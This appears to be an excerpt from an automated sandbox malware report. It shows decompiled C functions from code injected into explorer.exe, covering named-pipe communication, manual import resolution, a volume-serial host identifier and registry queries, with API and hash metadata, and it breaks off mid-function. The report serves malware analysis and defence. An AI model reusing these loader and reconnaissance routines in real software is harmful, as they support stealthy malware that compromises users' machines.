                                                                                                                                                                        0x007a3957
                                                                                                                                                                        0x007a3958
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3958
                                                                                                                                                                        0x007a389f
                                                                                                                                                                        0x007a38a3
                                                                                                                                                                        0x007a38a6
                                                                                                                                                                        0x007a392a
                                                                                                                                                                        0x007a392f
                                                                                                                                                                        0x007a3932
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3932
                                                                                                                                                                        0x007a38ab
                                                                                                                                                                        0x007a38b3
                                                                                                                                                                        0x007a38b8
                                                                                                                                                                        0x007a38bd
                                                                                                                                                                        0x007a38bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a38c3
                                                                                                                                                                        0x007a38c4
                                                                                                                                                                        0x007a38c6
                                                                                                                                                                        0x007a38f5
                                                                                                                                                                        0x007a3904
                                                                                                                                                                        0x007a3909
                                                                                                                                                                        0x007a390c
                                                                                                                                                                        0x007a3918
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3918
                                                                                                                                                                        0x007a38c8
                                                                                                                                                                        0x007a38cc
                                                                                                                                                                        0x007a38da
                                                                                                                                                                        0x007a38df
                                                                                                                                                                        0x007a38e3
                                                                                                                                                                        0x007a38e4
                                                                                                                                                                        0x007a38e9
                                                                                                                                                                        0x007a38ed
                                                                                                                                                                        0x007a38ed
                                                                                                                                                                        0x007a38f1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a38f1
                                                                                                                                                                        0x007a3815
                                                                                                                                                                        0x007a3818
                                                                                                                                                                        0x007a3860
                                                                                                                                                                        0x007a3861
                                                                                                                                                                        0x007a3864
                                                                                                                                                                        0x007a386c
                                                                                                                                                                        0x007a3871
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3871
                                                                                                                                                                        0x007a381b
                                                                                                                                                                        0x007a381e
                                                                                                                                                                        0x007a3847
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3847
                                                                                                                                                                        0x007a3823
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a382e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a382e
                                                                                                                                                                        0x007a37e7
                                                                                                                                                                        0x007a3b1f

                                                                                                                                                                        APIs
                                                                                                                                                                        • ConnectNamedPipe.KERNELBASE(00000000), ref: 007A37A8
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007A37B2
                                                                                                                                                                          • Part of subcall function 007AD1A6: FlushFileBuffers.KERNEL32(000003C4,?,007A3AC6,00000000,00000004), ref: 007AD1EC
                                                                                                                                                                        • DisconnectNamedPipe.KERNEL32 ref: 007A3B03
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                                                                                                                                                                        • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                        • API String ID: 2389948835-3858738763
                                                                                                                                                                        • Opcode ID: 858d9f3df7020b53b328a616b1c08c2f3e1e3552f2b041b00aae5b734f4a2a29
                                                                                                                                                                        • Instruction ID: 4d0b4fc592aba4f6aee9104276c02f0392bdd85a8f58846ce3172d8c54a85f46
                                                                                                                                                                        • Opcode Fuzzy Hash: 858d9f3df7020b53b328a616b1c08c2f3e1e3552f2b041b00aae5b734f4a2a29
                                                                                                                                                                        • Instruction Fuzzy Hash: E6A1C3B2508301AFE314DF64D889E6BB7E8EBC6314F408B1EF19596181DB7CDA04CB66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 218 7b370b-7b3719 219 7b371b-7b371e 218->219 220 7b3723-7b3763 GetModuleHandleA call 7aefa7 218->220 221 7b38d0-7b38d1 219->221 224 7b3769-7b3780 220->224 225 7b38ce 220->225 226 7b3783-7b378a 224->226 225->221 227 7b378c-7b3795 226->227 228 7b3797-7b37a7 226->228 227->226 229 7b37aa-7b37b1 228->229 229->225 230 7b37b7-7b37ce LoadLibraryA 229->230 231 7b37d8-7b37de 230->231 232 7b37d0-7b37d3 230->232 233 7b37ed-7b37f6 231->233 234 7b37e0-7b37eb 231->234 232->221 235 7b37f9 233->235 234->235 236 7b37fd-7b3803 235->236 237 7b3809-7b3821 236->237 238 7b38c0-7b38c9 236->238 239 7b3823-7b3842 237->239 240 7b3844-7b3872 237->240 238->229 243 7b3875-7b387b 239->243 240->243 244 7b38a9-7b38bb 243->244 245 7b387d-7b388b 243->245 244->236 246 7b388d-7b389f 245->246 247 7b38a1-7b38a7 245->247 246->244 247->244
                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E007B370B(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                        				intOrPtr* _v8;
                                                                                                                                                                        				signed int* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				struct HINSTANCE__* _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                        				signed int _v64;
                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                        				signed int _t115;
                                                                                                                                                                        				struct HINSTANCE__* _t121;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        
                                                                                                                                                                        				_t167 = __ecx;
                                                                                                                                                                        				_v44 = _v44 & 0x00000000;
                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                        					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                        					_v40 = E007AEFA7(_t167, _v48, "GetProcAddress");
                                                                                                                                                                        					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                        					_v32 = _v52;
                                                                                                                                                                        					_t109 = 8;
                                                                                                                                                                        					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                        						L24:
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v56 = 0x80000000;
                                                                                                                                                                        					_t112 = 8;
                                                                                                                                                                        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                        						_v8 = _v8 + 0x14;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t115 = 8;
                                                                                                                                                                        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                        						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                                                                                                                                                                        						_v36 = _t121;
                                                                                                                                                                        						if(_v36 != 0) {
                                                                                                                                                                        							if( *_v8 == 0) {
                                                                                                                                                                        								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v12 =  *_v8 + _a4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v28 = _v28 & 0x00000000;
                                                                                                                                                                        							while( *_v12 != 0) {
                                                                                                                                                                        								_v24 = _v24 & 0x00000000;
                                                                                                                                                                        								_v16 = _v16 & 0x00000000;
                                                                                                                                                                        								_v64 = _v64 & 0x00000000;
                                                                                                                                                                        								_v20 = _v20 & 0x00000000;
                                                                                                                                                                        								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                        									_v60 =  *_v12 + _a4;
                                                                                                                                                                        									_v20 = _v60 + 2;
                                                                                                                                                                        									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                                                                                                                                                        									_v16 = _v40(_v36, _v20);
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_v24 =  *_v12;
                                                                                                                                                                        									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                        									_v16 = _v40(_v36, _v20);
                                                                                                                                                                        								}
                                                                                                                                                                        								if(_v24 != _v16) {
                                                                                                                                                                        									_v44 = _v44 + 1;
                                                                                                                                                                        									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                        										 *_v12 = _v16;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								_v12 =  &(_v12[1]);
                                                                                                                                                                        								_v28 = _v28 + 4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v8 = _v8 + 0x14;
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t163 = 0xfffffffd;
                                                                                                                                                                        						return _t163;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L24;
                                                                                                                                                                        				}
                                                                                                                                                                        				return __eax | 0xffffffff;
                                                                                                                                                                        			}

























                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 007B3728
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(00000000), ref: 007B37C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                        • API String ID: 4133054770-1584408056
                                                                                                                                                                        • Opcode ID: 12f1a5ca6d3373ff4fe1a67b49c16042bc258c2a85929546ee123cba16140ad0
                                                                                                                                                                        • Instruction ID: f230a1508378699a01b06f457c51019b473eb14de485c191a5139b929cc678ea
                                                                                                                                                                        • Opcode Fuzzy Hash: 12f1a5ca6d3373ff4fe1a67b49c16042bc258c2a85929546ee123cba16140ad0
                                                                                                                                                                        • Instruction Fuzzy Hash: 72616DB5D00209EFDB00CF98C885BEDBBF1BF48315F248599E915AB291D778AA80DB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%


                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E007AC5EC(WCHAR* __ecx, WCHAR* __edx) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				long _v12;
                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                        				short _v528;
                                                                                                                                                                        				short _v1040;
                                                                                                                                                                        				short _v1552;
                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                        				WCHAR* _t27;
                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				long _t38;
                                                                                                                                                                        				WCHAR* _t43;
                                                                                                                                                                        				WCHAR* _t56;
                                                                                                                                                                        
                                                                                                                                                                        				_t44 = __ecx;
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                        				_t56 = __ecx;
                                                                                                                                                                        				E007A8D6D(__edx, 0, 0x100);
                                                                                                                                                                        				_v12 = 0x100;
                                                                                                                                                                        				_t23 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
                                                                                                                                                                        				lstrcpynW(__edx,  &_v528, 0x100);
                                                                                                                                                                        				_t27 = E007A9DF2(_t44, 0xad6); // executed
                                                                                                                                                                        				_v16 = _t27;
                                                                                                                                                                        				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				_v8 = _v8 &  ~_t29;
                                                                                                                                                                        				E007A8BAF( &_v16);
                                                                                                                                                                        				_t33 = E007AA456(_t43);
                                                                                                                                                                        				E007A9E51( &(_t43[E007AA456(_t43)]), 0x100 - _t33, L"%u", _v8);
                                                                                                                                                                        				lstrcatW(_t43, _t56);
                                                                                                                                                                        				_t38 = E007AA456(_t43);
                                                                                                                                                                        				_v12 = _t38;
                                                                                                                                                                        				CharUpperBuffW(_t43, _t38);
                                                                                                                                                                        				return E007AE2C5(_t43, E007AA456(_t43) + _t40, 0);
                                                                                                                                                                        			}

















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000100), ref: 007AC633
                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 007AC665
                                                                                                                                                                          • Part of subcall function 007A9E51: _vsnwprintf.MSVCRT ref: 007A9E6E
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00000114), ref: 007AC69E
                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 007AC6B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 455400327-0
                                                                                                                                                                        • Opcode ID: 8695bbca61c1d11a8629cc55bb02b6cec79c9983c2e80c3a69a76ff0bcc8d674
                                                                                                                                                                        • Instruction ID: cd4b0217851d163214367ec232570ad24b208e128c26cc39eeff71c717cc2b26
                                                                                                                                                                        • Opcode Fuzzy Hash: 8695bbca61c1d11a8629cc55bb02b6cec79c9983c2e80c3a69a76ff0bcc8d674
                                                                                                                                                                        • Instruction Fuzzy Hash: 99214CB2900114FFDB10ABA4DC4EFEE77BCDB85310F108665F605D6181EA785E44C765
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 268 7acdc3-7acdf2 RegOpenKeyExW 269 7acdf8-7ace16 RegQueryValueExW 268->269 270 7acdf4-7acdf6 268->270 272 7ace18-7ace28 call 7a8bde 269->272 273 7ace53-7ace56 269->273 271 7ace66-7ace68 270->271 272->273 279 7ace2a-7ace44 RegQueryValueExW 272->279 274 7ace58-7ace5d 273->274 275 7ace63 273->275 274->275 277 7ace65 275->277 277->271 280 7ace69-7ace76 RegCloseKey 279->280 281 7ace46-7ace52 call 7a8bf4 279->281 280->277 281->273
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007ACDC3(short* __edx, short* _a4) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				int _v12;
                                                                                                                                                                        				int _v16;
                                                                                                                                                                        				char* _v20;
                                                                                                                                                                        				char* _t30;
                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                        				char* _t49;
                                                                                                                                                                        
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
                                                                                                                                                                        					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                                                                                                                                                                        						L6:
                                                                                                                                                                        						if(_v8 != 0) {
                                                                                                                                                                        							_t31 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t30 = 0;
                                                                                                                                                                        						L9:
                                                                                                                                                                        						return _t30;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t49 = E007A8BDE(_v12);
                                                                                                                                                                        					_v20 = _t49;
                                                                                                                                                                        					if(_t49 == 0) {
                                                                                                                                                                        						goto L6;
                                                                                                                                                                        					}
                                                                                                                                                                        					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
                                                                                                                                                                        						RegCloseKey(_v8);
                                                                                                                                                                        						_t30 = _t49;
                                                                                                                                                                        						goto L9;
                                                                                                                                                                        					}
                                                                                                                                                                        					E007A8BF4( &_v20, 0xfffffffe);
                                                                                                                                                                        					goto L6;
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}











                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,00000000,00000000,?,?,007A30F8,00000000), ref: 007ACDEA
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,007A30F8,00000000,?,00000000,007A30F8,00000000,?,?,007A30F8,00000000), ref: 007ACE0E
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,007A30F8,00000000,00000000,00000000,007A30F8,?,?,007A30F8,00000000), ref: 007ACE3C
                                                                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,007A30F8,00000000,?,?,?,?,?,?,?,000003D5,?), ref: 007ACE71
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1586453840-0
                                                                                                                                                                        • Opcode ID: eb625c97c5544b2254737fc17d961b115af35adad9d0ee1d6c8b75c7bc162e3c
                                                                                                                                                                        • Instruction ID: bd98f0f9f16d336d55d8de61bbc0776ed1bb09e379b4e2f5b65d6cf5b35e37cd
                                                                                                                                                                        • Opcode Fuzzy Hash: eb625c97c5544b2254737fc17d961b115af35adad9d0ee1d6c8b75c7bc162e3c
                                                                                                                                                                        • Instruction Fuzzy Hash: 02211A76904118FFDB11DFA9DC48EAEBBF8FF89B00B1442A9F505E6120D7359A00DBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 284 7ab8a7-7ab8b5 285 7ab8bf-7ab8d0 CreateToolhelp32Snapshot 284->285 286 7ab8b7-7ab8ba 284->286 288 7ab8dc-7ab90d call 7a8d6d Module32First 285->288 289 7ab8d2-7ab8da GetLastError 285->289 287 7ab967-7ab969 286->287 294 7ab90f-7ab918 288->294 295 7ab91d-7ab937 call 7a95d7 call 7aa05c 288->295 290 7ab91a-7ab91b 289->290 292 7ab966 290->292 292->287 294->290 301 7ab95a-7ab965 295->301 302 7ab939-7ab94b 295->302 301->292 302->295 305 7ab94d-7ab958 FindCloseChangeNotification 302->305 305->292
                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                        			E007AB8A7(signed int __eax, void* __ebx, int __ecx, void* __edx) {
                                                                                                                                                                        				char _v520;
                                                                                                                                                                        				void* _v552;
                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				intOrPtr _t28;
                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                        				void* _t44;
                                                                                                                                                                        				void* _t46;
                                                                                                                                                                        
                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                        				if(__ecx != 0) {
                                                                                                                                                                        					_t46 = CreateToolhelp32Snapshot(8, __ecx);
                                                                                                                                                                        					if(_t46 != 0xffffffff) {
                                                                                                                                                                        						E007A8D6D( &_v552, 0, 0x224);
                                                                                                                                                                        						_v552 = 0x224;
                                                                                                                                                                        						if(Module32First(_t46,  &_v552) != 0) {
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								E007A95D7( &_v520);
                                                                                                                                                                        								if(E007AA05C( &_v520, _t44) == 0) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_push( &_v552);
                                                                                                                                                                        								_t28 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        								_push(_t46);
                                                                                                                                                                        								if( *((intOrPtr*)(_t28 + 0x1c))() != 0) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								FindCloseChangeNotification(_t46);
                                                                                                                                                                        								_t26 = 0;
                                                                                                                                                                        								L11:
                                                                                                                                                                        								return _t26;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t23 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        							 *((intOrPtr*)(_t23 + 0x30))(_t46);
                                                                                                                                                                        							_t26 = 1;
                                                                                                                                                                        							goto L11;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t32 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t32 + 0x30))(_t46);
                                                                                                                                                                        						_push(0xfffffffd);
                                                                                                                                                                        						L6:
                                                                                                                                                                        						_pop(_t26);
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					}
                                                                                                                                                                        					GetLastError();
                                                                                                                                                                        					_push(0xfffffffe);
                                                                                                                                                                        					goto L6;
                                                                                                                                                                        				}
                                                                                                                                                                        				return __eax | 0xffffffff;
                                                                                                                                                                        			}












                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008), ref: 007AB8C8
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007AB8D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateErrorLastSnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4136412728-0
                                                                                                                                                                        • Opcode ID: 84dff50771563ea1f70c198a46f4e96095cee6d72cd2bd0a80b0569f9647352b
                                                                                                                                                                        • Instruction ID: 129db5e1b74a441c269e1b179db4063c7897ae9b6cf4b4843f62dc395f92738b
                                                                                                                                                                        • Opcode Fuzzy Hash: 84dff50771563ea1f70c198a46f4e96095cee6d72cd2bd0a80b0569f9647352b
                                                                                                                                                                        • Instruction Fuzzy Hash: 46215471500515EFC710ABA8FC49EDA77E8AF8D314F1043B0F625D71A2D738EA418B95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 306 7acd27-7acd4f RegOpenKeyExA 307 7acd51-7acd53 306->307 308 7acd55-7acd72 RegQueryValueExA 306->308 311 7acdbf-7acdc2 307->311 309 7acdad-7acdb0 308->309 310 7acd74-7acd83 call 7a8bde 308->310 313 7acdbd 309->313 314 7acdb2-7acdba RegCloseKey 309->314 310->309 316 7acd85-7acd9f RegQueryValueExA 310->316 313->311 314->313 316->309 317 7acda1-7acda6 316->317 317->309 318 7acda8-7acdab 317->318 318->309
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007ACD27(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				int _v12;
                                                                                                                                                                        				int _v16;
                                                                                                                                                                        				intOrPtr* _t43;
                                                                                                                                                                        				char* _t46;
                                                                                                                                                                        
                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
                                                                                                                                                                        					_t46 = E007A8BDE(_v12 + 1);
                                                                                                                                                                        					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
                                                                                                                                                                        						_t43 = _a12;
                                                                                                                                                                        						if(_t43 != 0) {
                                                                                                                                                                        							 *_t43 = _v12;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                                                        					RegCloseKey(_v8);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t46;
                                                                                                                                                                        			}









                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00020019,?,00000000,00EAFA30,?,00000001), ref: 007ACD4A
                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,00000001,00000000,?,00000000,00000001,?,00000001), ref: 007ACD6D
                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,00000001,00000000,?,00000000,00000001,?,00000001), ref: 007ACD9A
                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00000001), ref: 007ACDBA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1586453840-0
                                                                                                                                                                        • Opcode ID: da30c85091a41973e929b094b61e9ee0d8eee7dc2366abe4f3b7de652df34147
                                                                                                                                                                        • Instruction ID: 540033bdcb4da723d890ef8f99652fc1820f17bb78ba603df95242ae2657efeb
                                                                                                                                                                        • Opcode Fuzzy Hash: da30c85091a41973e929b094b61e9ee0d8eee7dc2366abe4f3b7de652df34147
                                                                                                                                                                        • Instruction Fuzzy Hash: 5321B675A00108BFDB21DFA9DC44DAEBFB8EB89744B1441A9F915DB224D735DA00DBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E007AA205(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                        				void* _t50;
                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t56;
                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                        				intOrPtr _t65;
                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t70;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t74;
                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                        				intOrPtr _t83;
                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                        				intOrPtr _t91;
                                                                                                                                                                        				intOrPtr _t92;
                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t100;
                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_v8 = __edx;
                                                                                                                                                                        				_v12 = __ecx;
                                                                                                                                                                        				_t74 =  *0x7bf904; // 0x3b0
                                                                                                                                                                        				_t100 = 0;
                                                                                                                                                                        				if(E007AB149(_t74, 0x7530) >= 0) {
